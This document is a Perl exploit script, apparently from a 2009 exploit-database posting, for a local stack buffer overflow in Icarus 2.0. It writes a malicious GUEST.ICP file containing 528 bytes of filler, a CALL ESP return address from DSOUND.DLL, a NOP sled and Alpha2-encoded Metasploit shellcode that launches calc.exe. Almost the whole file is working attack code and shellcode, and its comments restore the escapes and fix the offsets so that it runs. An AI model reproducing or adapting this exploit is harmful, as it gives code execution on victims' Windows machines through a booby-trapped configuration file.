
# Title : Icarus 2.0 (.ICP File) Local Stack Overflow Exploit
# Published : 2009-07-14
# Author : [0]x80->[H]4x?20r


#!/usr/bin/perl
#[+]------------------------------/*HEADER*/----------------------------------------------[+]#
# Icarus 2.0  Local Stack-based Buffer overflow Exploit             			     #
# By : [0]x80->[H]4x?20r									     #
# Contact : hashteck[at]Gmail[dot]com						             #
# From : Morocco									     #
# PoC by : ThE g0bL!N									     #
#[+]--------------------------------------------------------------------------------------[+]#
# Program : Icarus 2.0  								     #
#[+]--------------------------------------------------------------------------------------[+]#
# Tested under Windows Vista Pro (NT 6.0). The CALL ESP return address used below was taken  #
# from that installation's DSOUND.DLL; it is not expected to be valid on other OS builds.     #
#[+]--------------------------------------------------------------------------------------[+]#
##############################################################################################
#####################################  Proud to be HACKER  ###################################
##############################################################################################
#[+]------------------------------/*HEADER*/----------------------------------------------[+]#
#											     #
#[+]------------------------------/*USAGE*/-----------------------------------------------[+]#
# Back up the original GUEST.ICP, then put the file generated by this script in the Icarus    #
# directory and launch Icarus.exe. If the overwrite lands, calc.exe is started.               #
#[+]------------------------------/*USAGE*/-----------------------------------------------[+]#
#											     #
#[+]------------------------------/*NOTES*/-----------------------------------------------[+]#
# Note: the shellcode is Alpha2-encoded. The program did not accept raw (non-encoded)        #
# shellcode, presumably because of bad characters in how the .ICP value is parsed; this was  #
# not investigated further. If you work it out, contact me.                                  #
#[+]------------------------------/*NOTES*/-----------------------------------------------[+]#


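use strict;
use warnings;

# Payload layout written to GUEST.ICP (offsets are into the whole file):
#
#   0    "server="            key the program reads from the .ICP file (see USAGE above)
#   7    'A' x 528            filler up to the saved return address
#   535  0x723D5528 (LE)      CALL ESP in DSOUND.DLL on the tested Vista build
#   539  NOP x 20             small sled so ESP does not have to point exactly at the code
#   559  330-byte shellcode   Metasploit win32_exec calc, Alpha2-encoded (see NOTES above)
#
# As published, every "\x.." escape in this listing had its backslash dropped by the hosting
# page (e.g. `"x41" x 528`, which would emit the literal text "x41" 528 times and break the
# offsets). The escapes are restored here.
#
# The return address is tied to the DLL build it was taken from; on a different OS version or
# with ASLR relocating DSOUND.DLL it must be re-found (e.g. with a CALL ESP / JMP ESP search).

# Return address: 0x723D5528, DSOUND.DLL, CALL ESP -- little-endian byte order.
my $ret_addr = "\x28\x55\x3D\x72";

# win32_exec - EXITFUNC=process CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com
my $shellcode =
    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x37\x49" .
    "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x4a" .
    "\x58\x50\x30\x42\x30\x42\x6b\x42\x41\x5a\x41\x42\x32\x42\x41\x32" .
    "\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x78\x69\x79\x6c\x4b" .
    "\x58\x71\x54\x53\x30\x65\x50\x35\x50\x4e\x6b\x33\x75\x67\x4c\x6e" .
    "\x6b\x51\x6c\x33\x35\x50\x78\x66\x61\x5a\x4f\x6e\x6b\x50\x4f\x32" .
    "\x38\x6c\x4b\x33\x6f\x41\x30\x35\x51\x48\x6b\x37\x39\x6c\x4b\x45" .
    "\x64\x6e\x6b\x56\x61\x7a\x4e\x56\x51\x6f\x30\x4c\x59\x4e\x4c\x4b" .
    "\x34\x4f\x30\x50\x74\x57\x77\x48\x41\x39\x5a\x76\x6d\x33\x31\x79" .
    "\x52\x6a\x4b\x6b\x44\x37\x4b\x42\x74\x74\x64\x55\x54\x50\x75\x6b" .
    "\x55\x4c\x4b\x61\x4f\x67\x54\x46\x61\x6a\x4b\x52\x46\x6e\x6b\x74" .
    "\x4c\x50\x4b\x4c\x4b\x53\x6f\x45\x4c\x76\x61\x38\x6b\x6e\x6b\x77" .
    "\x6c\x6c\x4b\x75\x51\x38\x6b\x6f\x79\x61\x4c\x54\x64\x75\x54\x6b" .
    "\x73\x56\x51\x4f\x30\x33\x54\x6e\x6b\x53\x70\x36\x50\x4c\x45\x6f" .
    "\x30\x53\x48\x54\x4c\x4c\x4b\x71\x50\x66\x6c\x6c\x4b\x32\x50\x47" .
    "\x6c\x6e\x4d\x4c\x4b\x70\x68\x45\x58\x7a\x4b\x77\x79\x4c\x4b\x6f" .
    "\x70\x4c\x70\x67\x70\x35\x50\x37\x70\x4c\x4b\x43\x58\x77\x4c\x43" .
    "\x6f\x74\x71\x59\x66\x63\x50\x42\x76\x6c\x49\x6a\x58\x4d\x53\x59" .
    "\x50\x61\x6b\x50\x50\x71\x78\x63\x4e\x48\x58\x39\x72\x51\x63\x32" .
    "\x48\x4f\x68\x4b\x4e\x6e\x6a\x46\x6e\x61\x47\x4b\x4f\x6a\x47\x73" .
    "\x53\x62\x41\x42\x4c\x55\x33\x67\x70\x4a";

# Build the complete file contents: header key, filler, return address, NOP sled, shellcode.
# Returns the payload as a byte string; takes no arguments.
sub build_payload {
    my $header = 'server=';
    my $filler = "\x41" x 528;   # 528 bytes from the start of the value to the saved EIP
    my $sled   = "\x90" x 20;
    return $header . $filler . $ret_addr . $sled . $shellcode;
}

# Write the payload to $path, replacing any existing file.
# Dies with the OS error if the file cannot be opened, written or closed.
sub write_payload {
    my ($path, $payload) = @_;
    # '>' rather than the original '>>': appending to an existing GUEST.ICP would put the
    # payload after the old contents and shift every offset above.
    open my $out, '>', $path or die "open $path: $!";
    # Raw bytes -- no newline translation on Windows.
    binmode $out;
    print {$out} $payload or die "write $path: $!";
    close $out or die "close $path: $!";
    return;
}

# Entry point. Optional first argument overrides the output file name (default GUEST.ICP,
# as in the original script).
sub main {
    my $path = @ARGV ? $ARGV[0] : 'GUEST.ICP';
    write_payload($path, build_payload());
    return;
}

main() unless caller;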

#----------------------------------------------------------------------------------#
# Welcome back Milw0rm & tnx to str0ke for his great j0b !!!11111oneleven11!!
#----------------------------------------------------------------------------------#

# www.Syue.com [2009-07-14]